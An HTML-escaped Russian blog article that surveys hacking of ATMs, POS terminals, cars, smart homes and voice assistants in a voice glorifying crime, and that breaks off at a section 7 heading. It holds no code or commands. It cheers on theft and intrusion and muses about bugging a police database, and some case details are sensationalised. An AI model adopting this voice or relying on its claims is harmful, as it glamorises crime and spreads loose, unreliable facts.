  &lt;p id=&quot;YdO2&quot;&gt;&lt;strong&gt;Цифровой взлом&lt;/strong&gt; — это когда ты рушишь границы, сидя у себя в квартире или в каком-нибудь грязном подвальчике. Это когда нет разницы, где ты находишься — твои щупальца могут дотянуться до любой точки мира. От бэкдоров и фишинга до вредоносных программ и сложных эксплойтов — всё это инструменты цифровой войны, где каждый день кто-то становится либо охотником, либо жертвой.&lt;/p&gt;
  &lt;ul id=&quot;51qn&quot;&gt;
    &lt;li id=&quot;fwXT&quot;&gt;&lt;strong&gt;Вредоносное ПО на службе хакера:&lt;/strong&gt; Запускаешь троян, захватываешь систему, и всё — ты король её данных. Весь их &amp;quot;цифровой замок&amp;quot; — просто игрушка в твоих руках.&lt;/li&gt;
    &lt;li id=&quot;EbOO&quot;&gt;&lt;strong&gt;Социальная инженерия — искусство манипуляции:&lt;/strong&gt; Подделывай письма, взламывай мозги, заставляй людей передавать тебе нужные данные. Ты не просто хакер — ты мастер обмана.&lt;/li&gt;
    &lt;li id=&quot;K3ye&quot;&gt;&lt;strong&gt;Эксплойты: защита? Не слышали:&lt;/strong&gt; Всегда есть дыра в любой системе. Ты её находишь и пробиваешься внутрь, словно заточенная стрела. Всё, что нужно — это остаться незамеченным.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;zkFv&quot;&gt;Самые вкусные операции всегда происходят на стыке физического и цифрового взлома. Ты можешь быть лучшим хакером в мире, но иногда нужно войти в систему напрямую, подключиться руками, а не через сетевые каналы. И наоборот, иногда твоё железо просто мостик, чтобы доставить цифровую отраву прямо в сердце защищённой системы. О, у меня на этот случай есть прекрасный пример: база данных МВД расположена локально, а значит, чтобы протянуться своими щупальцами до самых её корней, нужно чтобы некий физический передатчик был закреплён и вставлен в устройство, подключенное к этой самой базе.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;zOhC&quot; data-align=&quot;center&quot;&gt;2. Как взломать банкомат и стать богатым&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;mfNz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/41/0f/410fe62b-54e8-4bfd-ba44-859f6881d372.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Lw45&quot;&gt;Они стоят на каждом углу, выдают кэш тем, кто выполняет их требования, но на самом деле это просто большие и глупые машины, которые можно заставить работать на тебя. Банковские гиганты строят иллюзию безопасности, но, как и у любой другой системы, у банкоматов есть свои уязвимости. Это история о том, как мы можем превратить их в личные банкоматы, забирая деньги у тех, кто пытается всю эту систему контролировать.&lt;/p&gt;
  &lt;p id=&quot;anJo&quot;&gt;Когда-то всё было просто: небольшие устройства — скиммеры — устанавливались на банкоматы, чтобы снимать данные карт, которые потом продавались на тёмных рынках. Казалось бы, примитивный подход, но он приносил кучу денег. Эти устройства были первыми трещинами в системе, которая считала себя неуязвимой. Поставил скиммер, записал данные, и привет, кэш! Но технологии развивались, а вместе с ними и методы. Скимминг — это только верхушка айсберга.&lt;/p&gt;
  &lt;p id=&quot;R57g&quot;&gt;Настоящий взлом банкоматов начинается с цифровых атак. Хакеры поняли, что не нужно пытаться украсть данные карт — можно просто заставить банкомат выдать все деньги. Так появился джекпоттинг — искусство превращения банкоматов в бездонные кошельки. Хакеры загружали своё ПО в систему, подключались через уязвимые порты, и банкоматы начинали выплёвывать деньги, как испорченные игровые автоматы.&lt;/p&gt;
  &lt;p id=&quot;9mh4&quot;&gt;&lt;strong&gt;Методы взлома: &lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;Wb7s&quot;&gt;
    &lt;li id=&quot;FOcI&quot;&gt;&lt;strong&gt;Скимминг:&lt;/strong&gt; простой, но эффективный метод. Устанавливаешь устройство, которое копирует данные с карт, а иногда и пин-коды. Эволюция этой техники создала ультракомпактные скиммеры, которые почти невозможно заметить. Это было лишь начало.&lt;/li&gt;
    &lt;li id=&quot;WJAY&quot;&gt;&lt;strong&gt;Джекпоттинг:&lt;/strong&gt; это уже игра серьёзных игроков. Подключаешься к банкомату, запускаешь вредоносное ПО, и он начинает раздавать деньги по твоей команде. Легенды о хакерах, которые уносили миллионы, не просто слухи. Это оружие против системы, которая слишком долго считала себя неуязвимой.&lt;/li&gt;
    &lt;li id=&quot;PUzx&quot;&gt;&lt;strong&gt;Эксплойты в ПО:&lt;/strong&gt; банкоматы — это компьютеры, и они, как и все остальные, подвержены атакам. Используй флешку с нужным скриптом, загрузи эксплойт, и система больше не принадлежит банку — она под твоим контролем. Эти машины до сих пор работают на древних версиях Windows, и найти дыры в их защите проще, чем кажется.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;aIM1&quot;&gt;&lt;strong&gt;Кейсы, когда хакеры вывели деньги с банкоматов по всему миру&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;L3Pv&quot;&gt;
    &lt;li id=&quot;XWhL&quot;&gt;&lt;strong&gt;Европейский хаос:&lt;/strong&gt; хакерская группа устроила массовый джекпоттинг по всей Европе, управляя банкоматами как игрушками. Координация через даркнет, моментальный доступ к уязвимостям, и вот они уже срывают кэш пачками, пока полиция пытается понять, что происходит.&lt;/li&gt;
    &lt;li id=&quot;AMot&quot;&gt;&lt;strong&gt;Атака Cobalt в США:&lt;/strong&gt; одна из самых известных операций, когда взломы прокатились по крупнейшим банкам. Хакеры проникли в систему управления, отключили защиту и использовали джекпоттинг, чтобы вывести миллионы. Весь процесс выглядел как будто кто-то просто играл в игру на банкомате.&lt;/li&gt;
    &lt;li id=&quot;kMkk&quot;&gt;&lt;strong&gt;Карибский грабёж:&lt;/strong&gt; банкоматы стали уязвимыми из-за уязвимостей в удалённом доступе. Хакеры выстроили целую логистику: снимали деньги через банкоматы, передавали их курьерам, а те отправляли наличку по всему миру. Банковская система не успела опомниться.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;OKwF&quot;&gt;&lt;strong&gt;Современные методы защиты банкоматов и их слабые места&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;4lxB&quot;&gt;Банки не сдаются без боя. Они начинают внедрять новые защитные технологии, но всегда остаётся что-то, что можно обойти. Это гонка: они укрепляют свои стены, мы находим новые молотки, чтобы их разрушить.&lt;/p&gt;
  &lt;ul id=&quot;Ulfb&quot;&gt;
    &lt;li id=&quot;m6RG&quot;&gt;&lt;strong&gt;Анти-скиммерные технологии:&lt;/strong&gt; датчики, блокирующие подозрительные устройства. Но скиммеры стали настолько миниатюрными и сложными, что многие из этих систем их просто не замечают. Да и хакеры находят, как отключить эти датчики.&lt;/li&gt;
    &lt;li id=&quot;yWoM&quot;&gt;&lt;strong&gt;Шифрование и обновления ПО:&lt;/strong&gt; банки стараются держать свои системы в актуальном состоянии, но как часто они реально обновляют банкоматы? Большинство из них всё ещё работают на старых версиях Windows. Когда ты видишь на экране «Ошибка системы», знай: это наш шанс.&lt;/li&gt;
    &lt;li id=&quot;jT3K&quot;&gt;&lt;strong&gt;Физическая защита портов:&lt;/strong&gt; USB-порты блокируют и закрывают замками, но разве это помеха? Пара минут с нужными инструментами, и замок снят. Открываешь порт, подключаешься — и банкомат твой.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;EkMJ&quot;&gt;Банкоматы остаются одной из любимых мишеней, потому что их защита — это не более чем игра в догонялки. Они строят стены, мы ищем лазейки. И эта игра продолжается.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;YmMH&quot; data-align=&quot;center&quot;&gt;3. POS-терминалы под прицелом: укради, если сможешь&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;IPMI&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/44/9b/449b8112-a3fc-426b-a4b9-f04ce4b1b64c.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DRtP&quot;&gt;POS-терминалы и кассовые аппараты, вроде бы безобидные машинки, которые принимают оплату картами в магазинах, но на самом деле они — слабое звено в цепи, через которое можно получить доступ ко всем финансовым потокам. С одной стороны — удобство, с другой — беззащитность. С каждым годом методы взлома POS-систем становятся всё изощрённее, а хакеры используют эти устройства, чтобы ворваться в мир данных и денег.&lt;/p&gt;
  &lt;p id=&quot;qry9&quot;&gt;&lt;strong&gt;Как хакеры используют уязвимости в ПО и оборудовании:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;QET4&quot;&gt;POS-терминалы выглядят неприступными, но на самом деле это всего лишь компьютеры с устаревшим и уязвимым ПО. Большинство из них работают на старых версиях операционных систем, не имеют должного шифрования, и их безопасность часто игнорируется владельцами бизнеса. Самая большая слабость — уязвимость в программном обеспечении. Операторы терминалов редко обновляют ПО, из-за чего даже старые эксплойты остаются действенными.&lt;/p&gt;
  &lt;ul id=&quot;btyL&quot;&gt;
    &lt;li id=&quot;Cm0F&quot;&gt;&lt;strong&gt;Уязвимости в коде ПО:&lt;/strong&gt; банальные ошибки программистов или уязвимости, оставшиеся без внимания — это золотая жила для хакеров. Простейшие SQL-инъекции, XSS-атаки или баги в коде позволяют взломщикам получить доступ к внутренним системам терминала, а через него — и ко всем связанным с ним данным.&lt;/li&gt;
    &lt;li id=&quot;GEpl&quot;&gt;&lt;strong&gt;Отсутствие шифрования:&lt;/strong&gt; данные карт часто передаются через POS без должного шифрования. Да, это кажется безумием, но многие устаревшие системы до сих пор не используют надёжные протоколы защиты. Это означает, что данные можно перехватить на лету, не прикладывая особых усилий.&lt;/li&gt;
    &lt;li id=&quot;Og3b&quot;&gt;&lt;strong&gt;Необновляемые терминалы:&lt;/strong&gt; у многих POS-систем нет стандартной процедуры обновления, а если она и есть, то администраторы забывают о ней, пока что-то не пойдёт не так. Хакеры любят такие устройства — уязвимости, обнаруженные несколько лет назад, всё ещё могут быть актуальны и использоваться для атак.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;hskP&quot;&gt;&lt;strong&gt;Методы атак: &lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;ZY1z&quot;&gt;
    &lt;li id=&quot;QMiY&quot;&gt;&lt;strong&gt;Перехват данных карт:&lt;/strong&gt; самые простые атаки — это перехват данных. Устанавливаешь скиммер или сниффер, который перехватывает данные карты в момент их передачи. Это может быть простое устройство, подключённое к терминалу, или вредоносное ПО, записывающее всё, что происходит в системе.&lt;/li&gt;
    &lt;li id=&quot;NBRH&quot;&gt;&lt;strong&gt;Фейковые терминалы:&lt;/strong&gt; хакеры ставят свои POS-терминалы, которые выглядят как настоящие. Покупатель вставляет карту, думая, что платит за кофе, а данные его карты уже летят на серверы хакеров. Такие терминалы можно встретить везде: от небольших кафе до крупных торговых центров.&lt;/li&gt;
    &lt;li id=&quot;t0gK&quot;&gt;&lt;strong&gt;Удалённые атаки:&lt;/strong&gt; для продвинутых хакеров физический доступ не всегда обязателен. Сканируя сети, они находят уязвимые терминалы и проникают в них удалённо, устанавливая свои скрипты для записи данных. Это особенно опасно, когда POS-система связана с сетью магазина и позволяет получить доступ ко всем кассам одновременно.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;UbuQ&quot;&gt;&lt;strong&gt;Известные кейсы: &lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;deBd&quot;&gt;
    &lt;li id=&quot;ai2g&quot;&gt;&lt;strong&gt;Атака на Target:&lt;/strong&gt; один из самых громких случаев, когда хакеры взломали сеть POS-терминалов и получили доступ к данным более чем 40 миллионов карт. Взломщики использовали уязвимости в системе и перехватывали данные в момент проведения транзакций. Магазины не успели даже понять, что произошло, как информация уже продавалась на тёмных рынках.&lt;/li&gt;
    &lt;li id=&quot;QV17&quot;&gt;&lt;strong&gt;Кража данных у Home Depot:&lt;/strong&gt; ещё одна эпичная атака, когда хакеры использовали POS-терминалы для кражи данных карт миллионов клиентов. Они внедрили вредоносное ПО, которое действовало как троян, тихо записывая всё, что проходило через терминалы. В результате — огромные убытки и проблемы с репутацией.&lt;/li&gt;
    &lt;li id=&quot;OvkL&quot;&gt;&lt;strong&gt;Проблемы с Chipotle:&lt;/strong&gt; сеть ресторанов пострадала от атаки, когда хакеры использовали старые уязвимости в ПО терминалов для перехвата данных карт. Как всегда, никто не заметил ничего подозрительного, пока данные клиентов не оказались в руках киберпреступников.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;gHsc&quot; data-align=&quot;center&quot;&gt;4. Куда уехала моя машинка?&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;MsQQ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/89/b9/89b98742-b380-4e01-bf29-46e4c3ddc959.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;StCx&quot;&gt;Автомобили давно перестали быть просто механическими монстрами на колёсах. Они стали умными, подключёнными, и из-за этого уязвимыми. Современные авто — это не только двигатель и колёса, но и целый компьютер на колёсах, набитый электроникой и ПО, которые делают их удобными для водителя, но и одновременно — открытыми для тех, кто умеет управлять машинами без ключей.&lt;/p&gt;
  &lt;p id=&quot;taHd&quot;&gt;&lt;strong&gt;Умные автомобили и их уязвимости: атаки на системы CAN-Bus, взломы беспилотников&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;cDXl&quot;&gt;CAN-Bus — это нервная система любого современного автомобиля, позволяющая всем системам и модулям машины общаться друг с другом. Электронный мозг контролирует всё: от тормозов до кондиционера. Вот только есть одно «но» — эти системы были спроектированы с акцентом на удобство, а не на безопасность. Любой, кто знает, как взломать CAN-Bus, может управлять машиной, как марионеткой. И чем умнее становятся автомобили, тем больше у них дыр.&lt;/p&gt;
  &lt;ul id=&quot;zXcL&quot;&gt;
    &lt;li id=&quot;ESKe&quot;&gt;&lt;strong&gt;CAN-Bus под ударом:&lt;/strong&gt; через эту сеть можно взять полный контроль над автомобилем. Доступ можно получить через диагностический порт или, что ещё хуже, удалённо через взломанные модули связи. Отключение тормозов, управление рулём, изменение настроек двигателя — всё это не из фантастики, а реальность сегодняшнего дня.&lt;/li&gt;
    &lt;li id=&quot;KKAP&quot;&gt;&lt;strong&gt;Беспилотники и их слабые места:&lt;/strong&gt; умные авто и беспилотники, которые должны были сделать нашу жизнь безопаснее, на самом деле привнесли новые угрозы. Взломать автопилот Tesla или другого беспилотника — это как выиграть лотерею, только вместо денег ты получаешь контроль над машиной. Модели с автопилотом полагаются на кучу сенсоров и ПО, и каждая из этих точек — уязвимость.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;sgsW&quot;&gt;&lt;strong&gt;Методы взлома: удалённый контроль над автомобилем, фальшивые ключи, манипуляция ПО&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;sz88&quot;&gt;
    &lt;li id=&quot;2nx8&quot;&gt;&lt;strong&gt;Удалённый контроль над автомобилем:&lt;/strong&gt; тебе не нужно физически находиться рядом с машиной, чтобы ей управлять. Хакеры научились внедряться в систему через интернет-соединение автомобиля, например, через уязвимые модули Wi-Fi или Bluetooth. Пара команд, и ты уже можешь управлять машиной из любой точки мира.&lt;/li&gt;
    &lt;li id=&quot;Ppf5&quot;&gt;&lt;strong&gt;Фальшивые ключи и релейные атаки:&lt;/strong&gt; даже если у тебя ключ в кармане, это не значит, что авто в безопасности. Релейные атаки позволяют перехватить сигнал ключа и передать его машине, словно ключ лежит рядом. Вор просто стоит рядом с автомобилем, пока его напарник сканирует ключ у тебя в квартире. Машина открывается и заводится, будто это и правда твой ключ.&lt;/li&gt;
    &lt;li id=&quot;0WYY&quot;&gt;&lt;strong&gt;Манипуляция ПО:&lt;/strong&gt; помимо физических уязвимостей, автомобили напичканы ПО, которое можно взломать и перепрограммировать. Подключение через диагностический порт, запуск нужного скрипта — и всё: автомобиль подчиняется твоим командам. Можно поменять настройки двигателя, отключить защитные системы, изменить параметры вождения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;LRkw&quot;&gt;&lt;strong&gt;Реальные примеры:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;jPNi&quot;&gt;
    &lt;li id=&quot;FYNz&quot;&gt;&lt;strong&gt;Атака на Jeep Cherokee:&lt;/strong&gt; одна из самых громких атак произошла, когда хакеры удалённо взломали Jeep и взяли его под контроль, сидя дома за ноутбуком. Они могли управлять рулём, отключать тормоза и контролировать все системы автомобиля. Водитель был беспомощен, а мир увидел, насколько уязвимы современные авто.&lt;/li&gt;
    &lt;li id=&quot;JzkX&quot;&gt;&lt;strong&gt;Взлом Tesla Model S:&lt;/strong&gt; хакеры нашли уязвимости в ПО автопилота Tesla и смогли полностью управлять машиной. Они манипулировали скоростью, рулевым управлением и могли дистанционно остановить автомобиль. Tesla, конечно, обновила ПО, но сам факт того, что даже такие машины могут быть взломаны, заставляет задуматься.&lt;/li&gt;
    &lt;li id=&quot;gJTh&quot;&gt;&lt;strong&gt;Проблемы у BMW и Mercedes:&lt;/strong&gt; хакеры не раз взламывали системы этих брендов, получая удалённый доступ к управлению и настройкам авто. Фишка в том, что чем сложнее система безопасности, тем интереснее найти, как её обойти. Эти кейсы показали, что ни один автопроизводитель не застрахован от кибератак.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;HlE2&quot;&gt;Автомобили, которые обещали стать умнее и безопаснее, стали новым фронтом для кибервойны. Уязвимости в CAN-Bus, автопилотах и ключах открыли двери для тех, кто умеет управлять машинами, не садясь за руль. В этой игре слабых мест слишком много, и пока автопроизводители пытаются их залатать, хакеры находят всё новые и новые способы показать, что нет ничего, что нельзя взломать.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;fetU&quot; data-align=&quot;center&quot;&gt;5. Взломай свой дом: умные замки и дурацкие ошибки&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;PvMd&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/85/dc/85dc4191-39d4-445b-a1b1-f1a1dde8f735.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ltfw&quot;&gt;Умные дома — это новый тренд, обещающий безопасность, комфорт и полный контроль. Камеры, умные замки, термостаты, лампочки, которые можно включать и выключать со смартфона. Звучит круто, да? Но реальность такова, что каждая умная штука в твоём доме — это потенциальная дверь для тех, кто знает, как пробраться внутрь. Когда все устройства связаны в одну сеть, у хакеров появляется золотая возможность: один уязвимый гаджет может превратить твой защищённый дом в открытую крепость.&lt;/p&gt;
  &lt;p id=&quot;z8NV&quot;&gt;Умные замки обещают безопасность и контроль, но на самом деле они часто становятся слабым звеном в системе защиты дома. В отличие от традиционных замков, которые можно вскрыть отмычкой, умные замки можно обмануть на уровне программного обеспечения или сигнала. Это как оставить дверь открытой, думая, что она закрыта на сверхнадёжный замок.&lt;/p&gt;
  &lt;ul id=&quot;gYDF&quot;&gt;
    &lt;li id=&quot;nprJ&quot;&gt;&lt;strong&gt;Подмена сигналов:&lt;/strong&gt; Умные замки часто работают через Bluetooth, Wi-Fi или NFC. Хакеры могут перехватить сигнал и воспроизвести его, заставляя замок открыться. Есть даже устройства, которые способны клонировать ключи доступа или перехватывать код, когда ты открываешь дверь своим телефоном.&lt;/li&gt;
    &lt;li id=&quot;s6uc&quot;&gt;&lt;strong&gt;Взлом мобильных приложений:&lt;/strong&gt; Почти все системы умного дома управляются через приложения. Если у приложения есть уязвимость — это игра на руку хакерам. Отправляешь фальшивую команду через уязвимое приложение — и вот твоя &amp;quot;защищённая&amp;quot; дверь уже открыта.&lt;/li&gt;
    &lt;li id=&quot;HztE&quot;&gt;&lt;strong&gt;Сила грубой силы:&lt;/strong&gt; Пин-коды и пароли — основная защита умных замков. Но что, если пароль — это 1234 или qwerty? Даже простая программа для подбора паролей может взломать такую &amp;quot;защиту&amp;quot; за считаные минуты. Да, это примитивно, но срабатывает удивительно часто.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;mUvx&quot;&gt;&lt;strong&gt;Атаки на системы умного дома:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;qPOR&quot;&gt;Умные дома — это не только замки. Здесь всё связано: лампочки, камеры, термостаты, датчики движения. Вся эта система должна работать как одно целое, но это делает её уязвимой: один хакнутый элемент, и вся сеть под контролем.&lt;/p&gt;
  &lt;ul id=&quot;VbZi&quot;&gt;
    &lt;li id=&quot;kEB8&quot;&gt;&lt;strong&gt;Лампочки-шпионы:&lt;/strong&gt; да-да, даже лампочки можно взломать. Philips Hue и другие бренды были под ударом, когда хакеры нашли способ проникать в сеть умного дома через подключённые лампочки. Взломанные лампочки могут передавать данные о том, когда ты дома, а когда нет, и даже управлять другими устройствами через общую сеть.&lt;/li&gt;
    &lt;li id=&quot;eTbg&quot;&gt;&lt;strong&gt;Управление термостатами:&lt;/strong&gt; умные термостаты, такие как Nest, могут быть взломаны, чтобы отключить или изменить температурный режим дома. Да, это кажется мелочью, но что, если тебя отключат от тепла в разгар зимы или поднимут температуру до такой степени, что находиться в доме станет невозможно? Всё это делается удалённо, и владелец часто даже не знает, что его дом взломан.&lt;/li&gt;
    &lt;li id=&quot;sf5Y&quot;&gt;&lt;strong&gt;Умные камеры и шпионские трюки:&lt;/strong&gt; камеры, которые обещают защиту, могут стать твоими врагами. Взлом камер позволяет хакерам следить за твоими передвижениями, знать, когда ты дома, а когда нет, и даже отключать сигнализацию, когда это нужно. Взломать камеры не сложнее, чем найти уязвимость в их ПО или взломать аккаунт, к которому они привязаны.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Sz3u&quot;&gt;&lt;strong&gt;Примеры атак: как хакеры получают доступ к домам через уязвимые устройства&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;t8sC&quot;&gt;
    &lt;li id=&quot;81MM&quot;&gt;&lt;strong&gt;Атака на Ring:&lt;/strong&gt; знаменитый случай, когда хакеры получили доступ к умным звонкам Ring и начали шпионить за жильцами. Злоумышленники могли говорить с жильцами, играть музыку и даже следить за происходящим. И всё это из-за слабых паролей и отсутствия двухфакторной аутентификации.&lt;/li&gt;
    &lt;li id=&quot;UIes&quot;&gt;&lt;strong&gt;Взлом умных камер Xiaomi:&lt;/strong&gt; уязвимость в камерах позволила хакерам не только получить доступ к изображению, но и управлять настройками камеры, получая доступ к видео из других домов, подключённых к той же сети. Камеры безопасности стали камерами наблюдения за самими жильцами.&lt;/li&gt;
    &lt;li id=&quot;46Mf&quot;&gt;&lt;strong&gt;Хакинг умных лампочек Philips Hue:&lt;/strong&gt; уязвимость позволила хакерам не только менять цвет и яркость лампочек, но и проникать глубже в систему умного дома. Через эту лазейку они могли управлять всем, что подключено к общей сети, включая замки и термостаты.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;TUs0&quot;&gt;Умные дома создавались для того, чтобы сделать нашу жизнь проще и безопаснее, но с каждым новым устройством мы добавляем новую точку уязвимости. Вся эта экосистема работает как единое целое, и стоит найти одну дыру — как весь дом окажется под твоим контролем. Защита? Да ладно, это просто новая игра в кошки-мышки.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;5bPQ&quot; data-align=&quot;center&quot;&gt;6. Голосовые ассистенты на службе хакера&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Mgz7&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/52/d8/52d80fe0-f16a-4188-bb88-f51a7cf7b3b2.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;D1R2&quot;&gt;Умные колонки и голосовые ассистенты — это тот же Большой Брат, только теперь он живёт у тебя дома и отвечает на твои вопросы. Система, которая должна приносить удобство, стала одной из самых уязвимых точек в цифровом мире. Amazon Echo, Google Home, Алиса и их собратья подслушивают разговоры, управляют домом, собирают данные и превращают твой дом в настоящий шпионский центр, работающий против тебя. А ты думал, что они просто играют музыку?&lt;/p&gt;
  &lt;p id=&quot;vzKi&quot;&gt;&lt;strong&gt;Основные уязвимости умных колонок:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;19Vs&quot;&gt;Умные колонки — это микрофоны, которые всегда включены и готовы записывать каждый твой шаг. Неважно, где ты их установил — в гостиной, кухне или спальне — они слышат всё, и в этом их слабость. Всё, что надо хакеру, — это найти способ подключиться, и вот он уже слышит всё, что происходит вокруг. Но подслушивание — это только начало. Хакеры могут использовать эти устройства для полного контроля над умным домом.&lt;/p&gt;
  &lt;ul id=&quot;55fC&quot;&gt;
    &lt;li id=&quot;sSj3&quot;&gt;&lt;strong&gt;Подслушивание и перехват данных:&lt;/strong&gt; большинство ассистентов подключены к облачным серверам, где обрабатываются все команды. Хакеры могут проникнуть в этот процесс, перехватить данные и использовать их в своих целях. Любой запрос, любая команда — это потенциальная уязвимость.&lt;/li&gt;
    &lt;li id=&quot;DsVt&quot;&gt;&lt;strong&gt;Доступ к настройкам и управлению устройствами:&lt;/strong&gt; умные колонки связаны с другими устройствами дома, от лампочек до дверных замков. Контролируя колонку, можно управлять всем домом. Плохо защищённый API, старые прошивки и незащищённые протоколы делают взлом реальностью.&lt;/li&gt;
    &lt;li id=&quot;h7xY&quot;&gt;&lt;strong&gt;Уязвимости ПО и встроенных функций:&lt;/strong&gt; умные колонки работают на ПО, которое регулярно обновляется, но часто оставляет уязвимости. От багов в голосовом распознавании до слабостей в системе безопасности — все эти проблемы открывают двери для хакеров.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;8JVb&quot;&gt;&lt;strong&gt;Методы атак: звуковые команды, вредоносные приложения, использование багов ПО&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;6NQv&quot;&gt;Ты думаешь, чтобы взломать колонку, нужен доступ к интернету? Не всегда. Хакеры нашли способы использовать сами голосовые команды, чтобы заставить ассистента подчиняться. Это не просто игры — это настоящее оружие в руках тех, кто знает, как с ним обращаться.&lt;/p&gt;
  &lt;ul id=&quot;VhtE&quot;&gt;
    &lt;li id=&quot;YTSk&quot;&gt;&lt;strong&gt;Звуковые команды и ультразвук:&lt;/strong&gt; колонка слушает всё и принимает команды. Но не только твои. Специально настроенные звуковые сигналы, которые человек не слышит, могут использоваться для взлома. Ультразвуковые команды отправляются прямо на колонку, которая выполняет их, даже не понимая, что происходит.&lt;/li&gt;
    &lt;li id=&quot;ZEfI&quot;&gt;&lt;strong&gt;Вредоносные приложения:&lt;/strong&gt; хакеры создают вредоносные навыки и приложения для умных ассистентов, которые устанавливаются как обычные функции. Эти приложения могут перехватывать команды, записывать разговоры и даже передавать управление другим устройствам. Простая игра на колонке может оказаться трояном, который захватит твой дом.&lt;/li&gt;
    &lt;li id=&quot;5e02&quot;&gt;&lt;strong&gt;Баги ПО и манипуляция настройками:&lt;/strong&gt; каждый баг — это возможность для взлома. Хакеры используют уязвимости в коде для удаления или подмены голосовых профилей, отключения безопасности и доступа к чувствительным данным. Классика жанра — воспользоваться дыркой в системе, чтобы обойти авторизацию и получить полный контроль.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;vv9s&quot;&gt;&lt;strong&gt;Известные кейсы: взломы Amazon Echo, Google Home и других устройств&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;YYJJ&quot;&gt;
    &lt;li id=&quot;T5GV&quot;&gt;&lt;strong&gt;Amazon Echo на службе шпионов:&lt;/strong&gt; хакеры не раз показывали, что Echo можно использовать как микрофон для прослушки. Одна из известных атак включала подмену прошивки устройства, чтобы оно записывало всё, даже когда микрофон был выключен. Звуковые данные отправлялись на серверы, откуда их можно было использовать для шантажа или продажи.&lt;/li&gt;
    &lt;li id=&quot;6Grw&quot;&gt;&lt;strong&gt;Взлом Google Home через ультразвук:&lt;/strong&gt; исследователи продемонстрировали, как команды, невидимые для человека, заставляли Google Home выполнять любые приказы — от включения камер до открытия дверей. Простые звуковые сигналы могли активировать ассистента и превратить его в невидимого шпиона.&lt;/li&gt;
    &lt;li id=&quot;YV7e&quot;&gt;&lt;strong&gt;Атака на Siri и другие ассистенты:&lt;/strong&gt; через публичные сети хакеры смогли взломать Siri и использовать её для доступа к личной информации владельцев. Злонамеренные команды позволяли отключать системы безопасности и управлять другими устройствами дома.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Qb5Q&quot;&gt;Колонки и голосовые ассистенты — это цифровые шпионы, которые были у нас дома ещё до того, как мы начали волноваться о приватности. Пока ты наслаждаешься музыкой и просишь их рассказать прогноз погоды, они записывают, передают и, конечно же, готовы подчиниться любому, кто найдёт способ захватить управление. Подключённый дом? Это не про комфорт, это про уязвимость, которая скрывается прямо у тебя на столе.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;IVT3&quot; data-align=&quot;center&quot;&gt;7. Город под контролем: взлом инфраструктуры и систем безопасности&lt;/h2&gt;
  &lt;/section&gt;
